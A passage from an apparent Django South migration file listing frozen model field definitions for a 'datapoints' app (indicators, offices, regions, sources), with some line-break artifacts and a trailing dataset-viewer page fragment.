'slug': ('autoslug.fields.AutoSlugField', [], {'unique': 'True', 'max_length': '50', 'populate_from': "'get_full_name'", 'unique_with': '()'}),
'start_date': ('django.db.models.fields.DateField', [], {})
},
u'datapoints.campaigntype': {
'Meta': {'object_name': 'CampaignType', 'db_table': "'campaign_type'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '55'})
},
u'datapoints.indicator': {
'Meta': {'ordering': "('name',)", 'object_name': 'Indicator', 'db_table': "'indicator'"},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_reported': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'short_name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique': 'True', 'max_length': '255', 'populate_from': "'name'", 'unique_with': '()'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['datapoints.Source']"})
},
u'datapoints.office': {
'Meta': {'object_name': 'Office', 'db_table': "'office'"},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '55'})
},
u'datapoints.region': {
'Meta': {'unique_together': "(('name', 'region_type', 'office'),)", 'object_name': 'Region', 'db_table': "'region'"},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latitude': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'longitude': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'office': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['datapoints.Office']"}),
'parent_region': ('django.db.models.fie
|
lds.related.ForeignKey', [], {'to': u"orm['datapoints.Re
|
gion']", 'null': 'True'}),
'region_code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'region_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['datapoints.RegionType']"}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique': 'True', 'max_length': '255', 'populate_from': "'name'", 'unique_with': '()'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['datapoints.Source']"})
},
u'datapoints.regiontype': {
'Meta': {'object_name': 'RegionType', 'db_table': "'region_type'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '55'})
},
u'datapoints.source': {
'Meta': {'object_name': 'Source', 'db_table': "'source'"},
u'id': ('django.db.mo
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.